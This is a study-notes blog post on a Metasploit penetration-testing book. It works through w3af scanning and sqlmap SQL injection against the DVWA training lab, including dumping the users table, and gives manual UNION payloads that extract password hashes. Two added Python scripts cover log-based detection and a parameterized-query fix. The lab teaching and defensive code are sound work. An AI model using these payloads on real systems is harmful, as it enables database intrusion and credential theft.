《Metasploit魔鬼训练营》 Chapter 4 (Part 1)

justforfun12 2016-02-24 10:51 Original post

p128 wmap

Same as yesterday: I scanned testfire.net and owaspbwa with these vulnerability scanners and none of them turned up a single vulnerability! I don't get it!

Update: it turned out the network connection had dropped at some point without my noticing. After reconnecting, the rescan succeeded.


p134 The scanning wonder w3af

# w3af_console
w3af>>> plugins
w3af/plugins>>> bruteforce form_auth 
w3af/plugins>>> bruteforce config form_auth 
w3af/plugins/bruteforce/config:form_auth>>> set passwdFile /usr/share/w3af/w3af/core/controllers/bruteforce/passwords.txt
w3af/plugins/bruteforce/config:form_auth>>> set usersFile /usr/share/w3af/w3af/core/controllers/bruteforce/users.txt 
w3af/plugins/bruteforce/config:form_auth>>> back
w3af/plugins>>> audit xss sqli

w3af/plugins>>> discovery webSpider
Unknown command 'discovery'
w3af/plugins>>> help
|-----------------------------------------------------------------------------|
| list           | List available plugins.                                    |
|-----------------------------------------------------------------------------|
| back           | Go to the previous menu.                                   |
| exit           | Exit w3af.                                                 |
|-----------------------------------------------------------------------------|
| audit          | View, configure and enable audit plugins                   |
| infrastructure | View, configure and enable infrastructure plugins          |
| grep           | View, configure and enable grep plugins                    |
| crawl          | View, configure and enable crawl plugins                   |
| evasion        | View, configure and enable evasion plugins                 |
| bruteforce     | View, configure and enable bruteforce plugins              |
| auth           | View, configure and enable auth plugins                    |
| output         | View, configure and enable output plugins                  |
| mangle         | View, configure and enable mangle plugins                  |
|-----------------------------------------------------------------------------|

So the discovery module the book describes no longer exists. A quick web search shows that discovery was renamed to the crawl module. Continuing:

w3af/plugins>>> crawl web_spider 
w3af/plugins>>> crawl config web_spider 
w3af/plugins/crawl/config:web_spider>>> set only_forward True 
w3af/plugins/crawl/config:web_spider>>> back
The configuration has been saved.
w3af/plugins>>> back

Basic plugin configuration done! Next, configure the scan target and the output format for the results:

w3af>>> target
w3af/config:target>>> set target http://www.dvssc.com/dvwa/index.php
w3af/config:target>>> back
The configuration has been saved.
w3af>>> plugins
w3af/plugins>>> output html_file 
w3af/plugins>>> output config html_file 
w3af/plugins/output/config:html_file>>> set verbose True 
w3af/plugins/output/config:html_file>>> back
The configuration has been saved.
w3af/plugins>>> back
w3af>>> start

The scan found results.


p137 Probing for SQL injection vulnerabilities

In Kali 2.0:

msf > use auxiliary/scanner/http/sqlmap
[-] Failed to load module: auxiliary/scanner/http/sqlmap

It seems this module has been removed. So I simply use sqlmap directly from the terminal instead.

First install a Firefox add-on called Tamper Data, which lets you view and modify the parameters a web application submits behind the scenes, such as POST parameters and cookie values.

Using injection, log in as admin to the SQL Injection training page on dvssc.com.

Submit some arbitrary data, capture the URL and cookies with Tamper Data, then run

# sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=a&Submit=Submit#' --cookie='security=low; PHPSESSID=ov3jmigsemo6d47367co53qq24'

which gives:

Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=-3209' OR 1543=1543#&Submit=Submit

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: id=-3023' OR 1 GROUP BY CONCAT(0x7178716a71,(SELECT (CASE WHEN (4203=4203) THEN 1 ELSE 0 END)),0x7178627671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: id=a' AND (SELECT * FROM (SELECT(SLEEP(5)))fHGe)#&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=a' UNION ALL SELECT CONCAT(0x7178716a71,0x4e4b7872695163554f65444d6e4a4f59764f54616879767062516e576373624d726e545a6b727472,0x7178627671),NULL#&Submit=Submit
---
[12:21:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0.12
[12:21:15] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.dvssc.com'

[*] shutting down at 12:21:15

Next, find the name of the MySQL database that holds the web application's data. Just append --dbs (enumerate database names) and -v 0 (verbosity level) to the previous command:

# sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=bb&Submit=Submit#' --cookie='security=low; PHPSESSID=ov3jmigsemo6d47367co53qq24' --dbs -v 0

--snip--
available databases [2]:
[*] dvwa
[*] information_schema

[*] shutting down at 12:32:39

information_schema is MySQL's built-in system database, so we focus on dvwa and enumerate the tables it contains:

# sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=bb&Submit=Submit#' --cookie='security=low; PHPSESSID=ov3jmigsemo6d47367co53qq24' -D dvwa --tables

--snip--
[12:35:54] [INFO] fetching tables for database: 'dvwa'
[12:35:54] [WARNING] reflective value(s) found and filtering out
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

Enumerating the columns of users reveals a password column, ha! Dump everything in it:

# sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=bb&Submit=Submit#' --cookie='security=low; PHPSESSID=ov3jmigsemo6d47367co53qq24' -D dvwa --tables -T users --columns

# sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=bb&Submit=Submit#' --cookie='security=low; PHPSESSID=ov3jmigsemo6d47367co53qq24' -D dvwa --tables -T users --columns --dump

[12:39:56] [INFO] table 'dvwa.users' dumped to CSV file '/root/.sqlmap/output/www.dvssc.com/dump/dvwa/users.csv'

Looking at users.csv, the admin password is stored as an MD5 hash; a quick Google search shows the password is admin.
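Seen from the defending side, every probe in the sqlmap output above also lands in the web server's access log. As an added example for these notes (not from the book or the original post), the script below parses constructed Apache combined-format log lines, URL-decodes each request and flags the UNION, tautology, SLEEP and INFORMATION_SCHEMA patterns together with the default sqlmap User-Agent; the log format, IPs and timestamps are assumptions.

```python
"""Flag SQL-injection probing in Apache access logs.
Added example for these notes, not code from the book or the original post.
The log lines are constructed; their payloads mirror the sqlmap output above."""
import re
from urllib.parse import unquote_plus

# Apache combined log: ip - - [time] "METHOD path HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$'
)

# Rules run against the URL-decoded request; each mirrors a technique seen above.
RULES = [
    ("union-select", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("boolean-or-tautology", re.compile(r"'\s*OR\s+\d+=\d+", re.I)),
    ("time-based-sleep", re.compile(r"\bSLEEP\s*\(", re.I)),
    ("schema-enumeration", re.compile(r"\bINFORMATION_SCHEMA\.", re.I)),
]
SCANNER_UA = re.compile(r"sqlmap", re.I)  # default sqlmap User-Agent string

def analyze_line(line):
    """Return (ip, decoded request, [rule names]) or None for unparsable/benign lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _ts, method, path, _status, ua = m.groups()
    decoded = unquote_plus(path)  # payloads arrive percent- or plus-encoded
    hits = [name for name, pat in RULES if pat.search(decoded)]
    if SCANNER_UA.search(ua):
        hits.append("sqlmap-user-agent")
    return (ip, f"{method} {decoded}", hits) if hits else None

def scan_log(lines):
    """Return one finding per suspicious line, preserving log order."""
    return [f for f in (analyze_line(l) for l in lines) if f]

# Constructed sample log: one normal request, three sqlmap probes, one manual UNION.
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Feb/2016:12:21:15 +0800] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4527 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/44.0"',
    '10.0.0.5 - - [24/Feb/2016:12:21:15 +0800] "GET /dvwa/vulnerabilities/sqli/?id=-3209%27%20OR%201543%3D1543%23&Submit=Submit HTTP/1.1" 200 4598 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '10.0.0.5 - - [24/Feb/2016:12:21:16 +0800] "GET /dvwa/vulnerabilities/sqli/?id=a%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29fHGe%29%23&Submit=Submit HTTP/1.1" 200 4527 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '10.0.0.5 - - [24/Feb/2016:12:21:21 +0800] "GET /dvwa/vulnerabilities/sqli/?id=a%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%23&Submit=Submit HTTP/1.1" 200 4611 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '10.0.0.7 - - [24/Feb/2016:13:05:02 +0800] "GET /dvwa/vulnerabilities/sqli/?id=%27+UNION+SELECT+1%2C+table_name+FROM+INFORMATION_SCHEMA.tables+--+%27&Submit=Submit HTTP/1.1" 200 7034 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/44.0"',
]

if __name__ == "__main__":
    for ip, req, hits in scan_log(SAMPLE_LOG):
        print(f"{ip}  {', '.join(hits)}\n    {req}")
```

Note that the last request carries a browser User-Agent, so the User-Agent rule alone would miss it; the decoded-request rules are what catch a hand-typed UNION.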


p150 SQL injection case analysis

After logging in to the SQL injection training page on www.dvssc.com, first set the security level to the lowest setting.

With a UNION injection, if the number of columns differs from that of the actual table, an error is reported:

For example, injecting

' UNION SELECT 1,2,3--'

gives the error

The used SELECT statements have a different number of columns


Continuing: by querying the INFORMATION_SCHEMA system tables you can list the name of every table and every column in this MySQL database:

' UNION SELECT 1, table_name FROM INFORMATION_SCHEMA.tables -- ' (there must be a space between the trailing comment marker -- and the closing ', otherwise it does not work!)
' UNION SELECT 1, column_name FROM INFORMATION_SCHEMA.columns WHERE table_name='users' -- '
' UNION SELECT 1, password FROM users -- '
' UNION SELECT password, concat(first_name, ' ', last_name, ' ', user) FROM users -- ' (the concat() function lets you pull back more information in one go)
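These payloads work because the id value is spliced straight into the SQL text. As an added example for these notes (not DVWA's or the book's code), the script below rebuilds that lookup in Python against a constructed sqlite3 users table standing in for MySQL: the concatenated version reproduces the column-count error and leaks every password hash, while the parameterized version treats the same input as a plain value. The table contents and hashes are constructed.

```python
"""The DVWA-style lookup behind the injections above, vulnerable and fixed.
Added example for these notes, not DVWA's or the book's code. Python's sqlite3
stands in for MySQL; the users table and its rows are constructed."""
import hashlib
import sqlite3

# Payloads from the notes above (sqlite3 also treats "-- " as a comment)
UNION_PAYLOAD = "' UNION SELECT user, password FROM users -- '"
BAD_COUNT_PAYLOAD = "' UNION SELECT 1,2,3 -- '"

def make_db():
    """Constructed stand-in for dvwa.users, with the column names seen above."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, user TEXT, first_name TEXT,"
        " last_name TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?, ?)",
        [(1, "admin", "admin", "admin", hashlib.md5(b"constructed-pw-1").hexdigest()),
         (2, "gordonb", "Gordon", "Brown", hashlib.md5(b"constructed-pw-2").hexdigest())],
    )
    return conn

def lookup_vulnerable(conn, user_id):
    """Splices the input into the SQL text, as DVWA does at the 'low' level."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()

def run_vulnerable(conn, user_id):
    """lookup_vulnerable, but hands back the DB error text instead of raising,
    to show the column-count mismatch the notes observe on MySQL."""
    try:
        return lookup_vulnerable(conn, user_id)
    except sqlite3.OperationalError as exc:
        return str(exc)

def lookup_safe(conn, user_id):
    """Same query with a bound parameter: the input can only ever be a value."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print("concatenated, UNION payload  :", lookup_vulnerable(db, UNION_PAYLOAD))
    print("concatenated, 3-column UNION :", run_vulnerable(db, BAD_COUNT_PAYLOAD))
    print("parameterized, UNION payload :", lookup_safe(db, UNION_PAYLOAD))
    print("parameterized, id 1          :", lookup_safe(db, 1))
```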

